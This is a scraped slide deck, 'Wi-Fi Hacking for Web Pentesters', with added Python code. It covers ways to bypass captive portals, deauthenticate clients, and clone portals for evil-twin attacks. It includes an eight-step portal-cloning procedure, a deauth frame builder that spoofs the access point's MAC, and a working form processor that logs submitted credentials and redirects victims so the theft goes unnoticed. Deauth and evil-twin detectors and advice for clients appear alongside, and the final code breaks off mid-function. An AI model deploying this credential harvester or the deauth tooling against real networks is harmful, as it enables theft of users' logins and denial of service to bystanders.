Wi-Fi Hacking for
Web Pentesters
Greg Foss
Sr. Security Research Engineer
@heinzarelli
Greg Foss
Sr. Security Research Engineer
OSCP, GAWN, GPEN, GWAPT, GCIH, CEH, CYBER APT
# whoami
*I am not liable for what you do with any of this information*
Section 638:17 House Bill 495 - US rules against wireless hacking
http://en.wikipedia.org/wiki/Legality_of_piggybacking#United_States
DISCLAIMER
Not a ‘Wi-Fi Security Expert’ nor a Lawyer
Just about everything I’m going to demonstrate is probably
illegal, don’t do any of this against unauthorized targets…
Not Discussing
Wi-Fi Security Basics
• 802.11 fundamentals
• WEP cracking - ridiculously easy, google it
• WPA / WPA2-PSK attacks - handshake capture and offline cracking (aircrack-ng)
• WPS attacks - Reaver (PIN brute force that hands back the WPA/WPA2 PSK)
• PEAP, LEAP, etc. - out of scope
Agenda…
it’s everywhere…
enough free WiFi that it’s almost not
worth the time it takes to infiltrate
unless free internet’s not the goal…
Bypassing is easy…
• Sometimes Tor or a VPN will simply be allowed
through the captive portal, no joke
• Try appending ?.jpg or ?.png to the URL
• Look for Open Redirect flaws, iFrames, etc.
• Tunnel out over DNS!
• Same tricks work if your ISP suspends your
internet access, depending on the ISP of
course…
Bypassing is easy…
• On time-limited access points, just change your
MAC when the time runs out. Or sniff MACs and
ride on another’s paid access.
• De-auth existing clients and/or DoS access points:
• aireplay-ng or airdrop-ng
• http://www.aircrack-ng.org/
• MDK3
• https://forums.kali.org/showthread.php?19498-MDK3-Secret-Destruction-Mode
Bypassing is easy…
• Sniff MAC Addresses and wait for a user to
go idle, then modify your MAC and IP to
match
• Works on just about any open access
point, especially captive portals
• CPSCAM by Josh Wright will do this for you:
• http://www.willhackforsushi.com/code/cpscam.pl
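The captive-portal detection and the URL-suffix bypass check from these slides, as an added example written for this page rather than code from the deck or from cpscam. It does what the OS connectivity probes do (fetch a known small page, expect its exact body, treat a redirect elsewhere as interception) and, only when that fails, retries with the extension suffixes from the slide. The probe URL and genuine body are Apple's hotspot-detect check; the two simulated portals, the splash HTML and the 10.0.0.1 address are constructed so the probe runs offline, and http_fetch() is what you would pass on a real network.

```python
"""Captive-portal probe with the '?.jpg' allow-list bypass check.

Added example for this page, not the deck's code. Detection mirrors the OS
connectivity checks; the bypass suffixes are the ones from the slide. The
simulated portals below are constructed stand-ins so this runs offline.
"""
import urllib.request
from urllib.error import HTTPError, URLError
from urllib.parse import urlparse

PROBE_URL = "http://captive.apple.com/hotspot-detect.html"
GENUINE_BODY = b"<HTML><HEAD><TITLE>Success</TITLE></HEAD><BODY>Success</BODY></HTML>"
SUFFIXES = ("?.jpg", "?.png", "?.gif", "?.css")  # allow-lists that match on the raw URL


def http_fetch(url, timeout=5):
    """Field fetcher: returns (status, final_url, body). urllib follows the
    portal's 302, so final_url shows where the client was actually sent."""
    req = urllib.request.Request(url, headers={"User-Agent": "CaptiveNetworkSupport/1.0 wispr"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.geturl(), resp.read(4096)
    except HTTPError as err:
        return err.code, err.geturl(), err.read(4096)
    except URLError:
        return None, url, b""


def classify(status, final_url, body):
    """'open' only if the real host answered with the genuine body; a redirect
    to a splash page, an injected page or an HTTP 511 all mean 'captive'."""
    if status is None:
        return "no-connectivity"
    same_host = urlparse(final_url).netloc == urlparse(PROBE_URL).netloc
    if status == 200 and same_host and b"Success" in body:
        return "open"
    return "captive"


def probe(fetch=http_fetch):
    """Returns {'state': ..., 'bypass': suffix-or-None}; suffixes are only
    tried once the plain probe shows we are behind a portal."""
    result = {"state": classify(*fetch(PROBE_URL)), "bypass": None}
    if result["state"] != "captive":
        return result
    for suffix in SUFFIXES:
        if classify(*fetch(PROBE_URL + suffix)) == "open":
            result["bypass"] = suffix
            break
    return result


# Constructed stand-ins for two portal implementations (no network needed).
SPLASH = b"<html><body><form action='/auth/login' method='post'>Log in for Wi-Fi</form></body></html>"


def naive_portal_fetch(url, timeout=5):
    """Weak portal: its 'free' allow-list is a suffix match on the whole
    request URL, so '?.jpg' after any path slips through unauthenticated."""
    if url.lower().endswith((".jpg", ".png", ".gif", ".css")):
        return 200, url, GENUINE_BODY
    return 200, "http://10.0.0.1/splash.html?redirect=" + url, SPLASH


def strict_portal_fetch(url, timeout=5):
    """Hardened portal: gates on the client's auth state, never on the URL,
    so every unauthenticated request lands on the splash page."""
    return 200, "http://10.0.0.1/splash.html?redirect=" + url, SPLASH


if __name__ == "__main__":
    print("naive portal :", probe(naive_portal_fetch))
    print("strict portal:", probe(strict_portal_fetch))
```

Run it with no arguments to see both simulations; on a real hotspot, call `probe()` and it uses http_fetch(). A portal that reports a bypass here is matching its allow-list against the raw request URL instead of the normalized host and path, which is the finding to write up.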
Hijacking is also easy…
The Evil Twin…
source: http://www.breakthesecurity.com/2014/04/evil-twin-attack-fake-wifi-hack.html
How to clone and weaponize captive portals
1. Connect to the access point and wait for the splash page to pop up.
2. Close the splash page and open your browser. Visit any random web page (http normally works better than https, because a plain-http request is what the portal can transparently intercept and redirect).
3. When the splash page comes up, save the entire landing page. Walk through the splash page and save additional pages as necessary.
4. Change the UA string and grab the mobile version as well if it exists.
5. Replace the form processor with one that writes a log file and passes the client through to a legitimate landing page.
6. Modify the page HTML to point to your form processor and modify parameters as necessary.
7. Deploy the captive portal (will discuss this shortly).
8. Use iptables to allow the victim's MAC through to the internet once the form processor has run.
Mobile Cloning
• HTTrack: http://www.httrack.com/
• VT View Source: https://play.google.com/store/apps/details?id=com.tozalakyan.viewsource&hl=en
How to Deauthenticate Clients
and DoS Access Points
• aireplay-ng using the --deauth flag
• file2air - deauth packet injection flood tool by Josh Wright
• http://www.willhackforsushi.com/code/file2air/1.1/file2air-1.1.tgz
• Spoof AP MAC, send deauth requests to clients
• Target a single user, all users, or AP itself
• MDK3 Deauth Amok Mode to take out all WPA AP’s
source: https://github.com/sophron/wifiphisher
source: https://www.isecpartners.com/blog/2013/july/man-in-the-middling-non-proxy-aware-wi-fi-devices-with-a-pineapple.aspx
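The deauth frames that aireplay-ng, file2air and MDK3 inject are 26-byte 802.11 management frames, and that same structure is what a wireless IDS keys on. What follows is an added example for this page, not code from any of those tools: a builder that produces the frame with the AP's MAC spoofed as sender, a header parser, and a sliding-window detector that flags a BSSID sourcing a burst of deauth or disassociation frames. The MAC addresses, the capture timings, the duration value and the 10-frames-in-5-seconds threshold are constructed assumptions; a real monitor-mode capture with the radiotap header stripped parses the same way.

```python
"""802.11 deauthentication: frame layout and a flood detector.

Added example for this page (not aireplay-ng, file2air or MDK3 code). The
builder emits the same management frame those tools inject so it can feed
the detector with constructed traffic; MACs, timings and threshold are
assumptions.
"""
import struct
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"
SUBTYPE_DISASSOC, SUBTYPE_DEAUTH = 10, 12
HDR = "<HH6s6s6sH"  # frame control, duration, addr1, addr2, addr3, sequence control


def mac_to_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def bytes_to_mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_deauth(dst, src, bssid, seq=0, reason=7):
    """Deauth as aireplay-ng --deauth sends it: type 0 (management), subtype
    12, addr1 = target (or broadcast), addr2/addr3 = the spoofed AP.
    Reason 7 = class 3 frame received from a non-associated station."""
    frame_control = 0x00C0  # low byte 0xC0: subtype 12, type 0, protocol version 0
    duration = 0x013A       # assumed value; the detector never looks at it
    header = struct.pack(HDR, frame_control, duration, mac_to_bytes(dst),
                         mac_to_bytes(src), mac_to_bytes(bssid), (seq & 0xFFF) << 4)
    return header + struct.pack("<H", reason)


def build_beacon(bssid, seq=0):
    """Minimal beacon (subtype 8), used only as benign filler in the sample."""
    header = struct.pack(HDR, 0x0080, 0, mac_to_bytes(BROADCAST),
                         mac_to_bytes(bssid), mac_to_bytes(bssid), (seq & 0xFFF) << 4)
    return header + bytes(12)  # timestamp(8) + interval(2) + capability(2), zeroed


def parse_frame(raw):
    """Decode the MAC header (no radiotap, no FCS) into a dict; None if too short."""
    if len(raw) < 24:
        return None
    fc, _duration, a1, a2, a3, seq_ctrl = struct.unpack_from(HDR, raw, 0)
    info = {
        "type": (fc >> 2) & 0x3,
        "subtype": (fc >> 4) & 0xF,
        "dst": bytes_to_mac(a1),
        "src": bytes_to_mac(a2),
        "bssid": bytes_to_mac(a3),
        "seq": seq_ctrl >> 4,
    }
    if info["type"] == 0 and info["subtype"] in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH) and len(raw) >= 26:
        info["reason"] = struct.unpack_from("<H", raw, 24)[0]
    return info


def detect_deauth_flood(frames, window=5.0, threshold=10):
    """frames: iterable of (timestamp_seconds, raw_frame). Returns one alert per
    BSSID that sources >= threshold deauth/disassoc frames inside any window."""
    recent = defaultdict(list)
    alerted = set()
    alerts = []
    for ts, raw in sorted(frames, key=lambda f: f[0]):
        p = parse_frame(raw)
        if not p or p["type"] != 0 or p["subtype"] not in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
            continue
        times = recent[p["bssid"]]
        times.append(ts)
        while ts - times[0] > window:   # drop frames that fell out of the window
            times.pop(0)
        if len(times) >= threshold and p["bssid"] not in alerted:
            alerted.add(p["bssid"])
            alerts.append({"bssid": p["bssid"], "count": len(times),
                           "first": times[0], "last": ts,
                           "broadcast": p["dst"] == BROADCAST, "reason": p.get("reason")})
    return alerts


# Constructed sample: the real AP beacons every 100 ms while an attacker,
# spoofing the AP's MAC, floods broadcast deauths at 20 per second from t=1.0s.
AP = "aa:bb:cc:dd:ee:ff"
SAMPLE_CAPTURE = (
    [(i * 0.1, build_beacon(AP, seq=i)) for i in range(30)]
    + [(1.0 + i * 0.05, build_deauth(BROADCAST, AP, AP, seq=i)) for i in range(30)]
)

if __name__ == "__main__":
    for alert in detect_deauth_flood(SAMPLE_CAPTURE):
        print(alert)
```

A broadcast destination with the AP's own MAC as source is the signature of the "all users" mode on the slide; a legitimate AP deauthenticating one misbehaving client sends a single unicast frame, which never reaches the threshold.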
Wi-Fi Pineapple
https://wifipineapple.com/
Generic Splash Page
Pineapple Configuration
/etc/nodogsplash/htdocs/splash.html
Landing Page
Pineapple Configuration - JavaScript Necessities
/www/[directory]/index.html
PHP Form Processor
Pineapple Configuration
Easier than using IPTables
/www/[directory]/auth/login.php
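Step 5 of the cloning procedure above and the Pineapple's /www/[directory]/auth/login.php do the same job: take the cloned form's POST, log it, and hand the client on to the real landing page. Below is an added example of that form processor written in Python for this page; it is not the deck's PHP, not nodogsplash, and not anything from the author's repository. The form path, the field names treated as secrets, the log location and the pass-through URL are assumptions, and it binds to port 8080 so it can run unprivileged in an engagement lab.

```python
"""Form processor for a cloned captive-portal splash page.

Added example for this page (Python stand-in for the deck's PHP login.php,
for use on an authorized engagement). Accepts the cloned form's POST, appends
the submission to a JSON-lines log, then 302s the client to the legitimate
landing page. Paths, field names and URLs are assumptions.
"""
import json
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

FORM_PATH = "/auth/login"                            # assumed: action= of the cloned form
PASS_THROUGH_URL = "http://192.0.2.1/welcome.html"   # assumed: real portal's post-login page
LOG_PATH = "/tmp/portal-submissions.jsonl"           # assumed
SECRET_FIELDS = ("password", "passwd", "pass", "pin")  # assumed names, masked on the console


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body into single-valued
    fields. Blank values are kept so an empty password is logged as such."""
    parsed = parse_qs(body.decode("utf-8", "replace"), keep_blank_values=True)
    return {name: values[0] for name, values in parsed.items()}


def build_record(client_ip, user_agent, fields, ts=None):
    """One log record per submission; ts is injectable for deterministic tests."""
    return {
        "ts": round(time.time() if ts is None else ts, 3),
        "client": client_ip,
        "user_agent": user_agent,
        "fields": dict(fields),
    }


def redact(record):
    """Copy of a record with secret-looking fields masked, for on-screen status."""
    masked = dict(record, fields=dict(record["fields"]))
    for name in masked["fields"]:
        if name.lower() in SECRET_FIELDS:
            masked["fields"][name] = "*" * 8
    return masked


def pass_through_location(request_path):
    """Where to send the client afterwards. If the cloned page carried the
    portal's own ?redirect= parameter (assumed name), honour it so the victim
    lands where they expected; otherwise use the default landing page."""
    target = parse_qs(urlparse(request_path).query).get("redirect", [""])[0]
    return target if target.startswith(("http://", "https://")) else PASS_THROUGH_URL


class LoginHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        if urlparse(self.path).path != FORM_PATH:
            self.send_error(404)
            return
        length = int(self.headers.get("Content-Length", "0"))
        fields = parse_form(self.rfile.read(length))
        record = build_record(self.client_address[0], self.headers.get("User-Agent", ""), fields)
        with open(LOG_PATH, "a", encoding="utf-8") as log:
            log.write(json.dumps(record) + "\n")
        print(json.dumps(redact(record)))
        # Hand the client on to the legitimate page so nothing looks broken.
        self.send_response(302)
        self.send_header("Location", pass_through_location(self.path))
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, fmt, *args):
        pass  # keep stdout for our own redacted records


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), LoginHandler).serve_forever()
```

The cloned HTML's form action is pointed at /auth/login on this host (step 6); the allow-through for the client's MAC (step 8, or nodogsplash on the Pineapple) is a separate step that this handler does not perform.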
A word of caution w/ the Pineapple…
Existing Router
Ideally one supporting guest mode…
DDWRT
• Flash with DDWRT, then you can use
NocatSplash to configure a captive portal.
• Many other ways to go about this…
DDWRT is just one of the easier options.
• http://www.dd-wrt.com/site/index
• http://sourceforge.net/projects/nocatsplash/
Laptop Hotspot and/or Proxy
• Kali Linux
• http://www.kali.org/
• Can do just about anything to connecting
clients
• Unlimited attack potential and plenty of
drive space to build elaborate landing
pages and believable scenarios
Laptop Hotspot and/or Proxy
• Makes hacking Wi-Fi even easier!
• https://github.com/SilverFoxx/PwnSTAR
PwnStar - By SilverFoxx
Demo
Deploy Malware
Combine Pineapple portability
with the versatility of Kali Linux
• http://www.offensive-security.com/kali-linux/kali-linux-evil-wireless-access-point/
BeagleBone Black + Alfa Wi-Fi Card
• http://beagleboard.org/black
• http://www.alfa.com.tw/
BeagleBone AP Deployment Options
get creative…
Going Mobile!
• Nexus Device with Kali NetHunter
• https://www.kali.org/kali-linux-nethunter/
• Pwnie Express Pwn Phone/Pad
• https://www.pwnieexpress.com/product/pwn-phone2014/
MITM Basic Tools
• AirSSL
• AirJack
• Airsnarf
• Dsniff
• Cain
• void11
• Ferret
• SSLStrip
• Wireshark
• AirPwn
• Ettercap
• Etc…
You don’t even need to authenticate to attack clients
Fun with MITM
• Snapception - https://github.com/thebradbain/snapception
• Love Thy Neighbors - http://neighbor.willhackforsushi.com/
• AirPWN - http://airpwn.sourceforge.net/Airpwn.html
• Intercepter-NG - http://intercepter.nerf.ru/
• Many, many more…
Demo
Client Defense…
• Always use a VPN/VPS/SSH Port Forwarding/
etc. when connected to an open access
point.
• Turn all Wireless devices off when traveling
or in crowded areas, many devices still
connect to wireless networks even when
‘sleeping’.
• Be suspicious of a hotspot whose login page is not served over HTTPS, and of any other generally odd behavior.
• Beware duplicate networks with different encryption (the same SSID offered both open and WPA2).
Client Defense…
• Use different login details and passwords for public wifi. Test with false credentials first; if it lets you through, it's not legit.
• Turn off Wi-Fi on devices when traveling.
• Exercise caution when connections suddenly
drop, especially if it happens for everyone on
the network.
• If it just ‘doesn’t feel right’ then trust your
instincts…
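The "duplicate networks with different encryption" rule above can be checked from a scan rather than by eye. This is an added example for this page, not code from the deck: it reads the AP section of an airodump-ng CSV (the real column layout; the rows here are constructed) and reports every ESSID that is broadcast both with and without encryption, noting whether the open copy is louder than the encrypted one and whether it comes from a different hardware vendor. The ESSIDs, BSSIDs, timestamps and signal levels are made up.

```python
"""Evil-twin check over an airodump-ng style AP table.

Added example for this page, not the deck's code. Applies the slide's rule to
the AP section of an airodump-ng CSV (real column layout, constructed rows).
"""
import csv
import io
from collections import defaultdict

# Constructed sample: two real WPA2 APs and one open rogue on the same ESSID,
# one unrelated open hotspot, then the station section that parsing stops at.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:00:00:01, 2015-03-01 10:00:00, 2015-03-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -67, 120, 0, 0.0.0.0, 9, CoffeeNet,
AA:BB:CC:00:00:02, 2015-03-01 10:00:00, 2015-03-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -72,  98, 0, 0.0.0.0, 9, CoffeeNet,
DE:AD:BE:EF:00:01, 2015-03-01 10:03:00, 2015-03-01 10:05:00,  6,  54, OPN,  ,  , -41, 300, 0, 0.0.0.0, 9, CoffeeNet,
AA:BB:CC:00:00:10, 2015-03-01 10:00:00, 2015-03-01 10:05:00,  1,  54, OPN,  ,  , -60, 110, 0, 0.0.0.0, 12, Airport-Free,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2015-03-01 10:01:00, 2015-03-01 10:05:00, -50, 40, AA:BB:CC:00:00:01, CoffeeNet
"""


def parse_airodump_aps(text):
    """Return the AP rows of an airodump-ng CSV as dicts; stop at the station table."""
    aps = []
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row or row[0] == "BSSID":
            continue
        if row[0] == "Station MAC":
            break
        if len(row) < 14:
            continue
        aps.append({
            "bssid": row[0].strip().lower(),
            "channel": int(row[3]),
            "privacy": row[5].strip(),      # airodump prints OPN for open networks
            "power": int(row[8]),           # dBm, so -41 is stronger than -67
            "essid": row[13].strip(),
        })
    return aps


def find_evil_twins(aps):
    """One finding per ESSID seen both open and encrypted. The open AP being
    louder than the encrypted one, or coming from a different OUI than the
    real deployment, is the shape an evil twin usually has."""
    by_essid = defaultdict(list)
    for ap in aps:
        if ap["essid"]:                      # hidden SSIDs cannot be compared
            by_essid[ap["essid"]].append(ap)
    findings = []
    for essid, group in sorted(by_essid.items()):
        open_aps = [a for a in group if a["privacy"] == "OPN"]
        secured = [a for a in group if a["privacy"] != "OPN"]
        if not (open_aps and secured):
            continue
        loud_open = max(open_aps, key=lambda a: a["power"])
        loud_sec = max(secured, key=lambda a: a["power"])
        secured_ouis = {a["bssid"][:8] for a in secured}
        findings.append({
            "essid": essid,
            "open_bssid": loud_open["bssid"],
            "open_power": loud_open["power"],
            "open_channel": loud_open["channel"],
            "secured_bssid": loud_sec["bssid"],
            "secured_power": loud_sec["power"],
            "secured_types": sorted({a["privacy"] for a in secured}),
            "louder_open": loud_open["power"] > loud_sec["power"],
            "vendor_mismatch": loud_open["bssid"][:8] not in secured_ouis,
        })
    return findings


if __name__ == "__main__":
    for finding in find_evil_twins(parse_airodump_aps(SAMPLE_CSV)):
        print(finding)
```

Point it at the `-01.csv` that `airodump-ng -w <prefix>` writes. An open hotspot that has no encrypted sibling (Airport-Free above) produces no finding; it may still be hostile, but this rule cannot tell, which is why the false-credentials test above is the second check.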
Resources
• http://www.willhackforsushi.com/code/cpscam.pl
• http://neighbor.willhackforsushi.com/
• http://www.aircrack-ng.org/
• http://www.dd-wrt.com/
• https://github.com/SilverFoxx/PwnSTAR
• http://www.offensive-security.com/kali-linux/kali-linux-evil-wireless-access-point/
• http://beagleboard.org/black
• http://www.armhf.com/boards/beaglebone-black/bbb-sd-install/
• http://grinninggecko.com/2013/09/13/kali-linux-on-headless-beaglebone-black-via-os-x/
• https://github.com/thebradbain/snapception
• http://airpwn.sourceforge.net/Airpwn.html
• http://intercepter.nerf.ru/
Thank You!
Questions?
https://github.com/gfoss/misc/Wireless/Captive-Portals/
Greg Foss
Senior Security Research Engineer
greg.foss[at]LogRhythm.com
@heinzarelli
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
James Anderson
 
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Thierry Lestable
 

Recently uploaded (20)

Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
 
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
 
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptxIOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
 
Search and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical FuturesSearch and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical Futures
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
 
ODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User GroupODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User Group
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
 
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
 

Wi-Fi Hotspot Attacks

  • 1. Wi-Fi Hacking for Web Pentesters Greg Foss Sr. Security Research Engineer @heinzarelli
  • 2. Greg Foss Sr. Security Research Engineer OSCP, GAWN, GPEN, GWAPT, GCIH, CEH, CYBER APT # whoami
  • 4. *I am not liable for what you do with any of this information* Section 638:17 House Bill 495 - US rules against wireless hacking http://en.wikipedia.org/wiki/Legality_of_piggybacking#United_States
  • 5. DISCLAIMER Not a ‘Wi-Fi Security Expert’ nor a Lawyer Just about everything I’m going to demonstrate is probably illegal, don’t do any of this against unauthorized targets…
  • 6. Not Discussing Wi-Fi Security Basics • 802.11 • WEP Cracking - ridiculously easy, google it • WPA / WPA2 Attacks - Reaver • WPS Attacks - Reaver • PEAP, LEAP, etc. - Out of Scope
  • 9. it’s everywhere… enough free WiFi that it’s almost not worth the time it takes to infiltrate unless free internet’s not the goal…
  • 10. Bypassing is easy… • Sometimes Tor or a VPN will simply be allowed through the captive portal, no joke • Try appending ?.jpg or ?.png to the URL • Look for Open Redirect flaws, iFrames, etc. • Tunnel out over DNS! • Same tricks work if your ISP suspends your internet access, depending on the ISP of course…
  • 11. Bypassing is easy… • On time-limited access points, just change your MAC when the time runs out. Or sniff MACs and ride on another’s paid access. • De-auth existing clients and/or DoS access points: • Aireplay-ng or Airdrop • http://www.aircrack-ng.org/ • MDK3 • https://forums.kali.org/showthread.php?19498-MDK3-Secret-Destruction-Mode
  • 12. Bypassing is easy… • Sniff MAC Addresses and wait for a user to go idle, then modify your MAC and IP to match • Works on just about any open access point, especially captive portals • CPSCAM by Josh Wright will do this for you: • http://www.willhackforsushi.com/code/cpscam.pl
  • 13. Hijacking is also easy…
  • 16. The Evil Twin… source: http://www.breakthesecurity.com/2014/04/evil-twin-attack-fake-wifi-hack.html
  • 25. How to clone and weaponize captive portals 1. Connect to the access point and wait for the splash page to pop up. 2. Close the splash page, and open your browser. Visit any random web page (http normally works better than https). 3. When the splash page comes up, save the entire landing page. Use the splash page and save additional pages as necessary. 4. Change the UA string and grab the mobile version as well if it exists. 5. Replace the form processor to write a log file and pass the client through to a legitimate landing page. 6. Modify the page HTML to point to your form processor and modify parameters as necessary. 7. Deploy the captive portal (will discuss this shortly) 8. Use IPTables to allow the victim’s MAC through to the internet using the form processor.
  • 29. Mobile Cloning • HTTrack: http://www.httrack.com/
  • 30. Mobile Cloning • VT View Source: https://play.google.com/store/apps/details?id=com.tozalakyan.viewsource&hl=en
  • 32. How to Deauthenticate Clients and DoS Access Points • Aireplay-ng using the --deauth flag • file2air - deauth packet injection flood tool by Josh Wright • http://www.willhackforsushi.com/code/file2air/1.1/file2air-1.1.tgz • Spoof AP MAC, send deauth requests to clients • Target a single user, all users, or the AP itself • MDK3 Deauth Amok Mode to take out all WPA APs
  • 33. How to Deauthenticate Clients and DoS Access Points source: https://github.com/sophron/wifiphisher
  • 34. How to Deauthenticate Clients and DoS Access Points https://github.com/sophron/wifiphisher
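The deauth slides above describe frames that are spoofed to look like they come from the AP itself, so the source address cannot tell an attack apart from a legitimate disconnect; what stands out on the air is the rate and the broadcast receiver address that "deauth everyone" tools use. The following detector is an added example for those slides, in Python, not code from the talk or from any tool it names. The frame records, BSSIDs and client MAC are constructed and the window/threshold values are assumptions to tune per site; on a real sensor the records would come from a monitor-mode capture.

```python
"""Deauthentication-flood detector run over constructed 802.11 frame records.

Added example, not code from the talk or the tools it names. Frame records,
MAC addresses and thresholds below are constructed assumptions.
"""
from collections import defaultdict, deque
from dataclasses import dataclass

BROADCAST = "ff:ff:ff:ff:ff:ff"
BEACON = 0x08      # management subtype 8  = Beacon
DISASSOC = 0x0A    # management subtype 10 = Disassociation
DEAUTH = 0x0C      # management subtype 12 = Deauthentication


@dataclass(frozen=True)
class Frame:
    ts: float      # capture timestamp in seconds
    subtype: int   # 802.11 management frame subtype
    bssid: str     # BSSID field of the frame
    src: str       # transmitter address (a spoofing tool sets this to the AP's MAC)
    dst: str       # receiver address; broadcast means "everyone on this BSS"


def detect_deauth_flood(frames, window=2.0, threshold=10):
    """Return one alert per BSSID whose deauth/disassoc count reaches
    `threshold` within any `window`-second span.

    The source address is not used as a signal: deauth tools spoof the AP's
    own MAC, so only the rate and the broadcast receiver address stand out.
    """
    recent = defaultdict(deque)    # bssid -> timestamps inside the window
    broadcast = defaultdict(int)   # bssid -> broadcast-targeted deauths seen
    alerts, alerted = [], set()
    for f in sorted(frames, key=lambda x: x.ts):
        if f.subtype not in (DEAUTH, DISASSOC):
            continue                       # beacons, probes etc. are ignored
        q = recent[f.bssid]
        q.append(f.ts)
        while q and f.ts - q[0] > window:  # slide the window forward
            q.popleft()
        if f.dst == BROADCAST:
            broadcast[f.bssid] += 1
        if len(q) >= threshold and f.bssid not in alerted:
            alerted.add(f.bssid)           # one alert per BSSID per run
            alerts.append({
                "bssid": f.bssid,
                "count": len(q),
                "window_s": window,
                "broadcast": broadcast[f.bssid],
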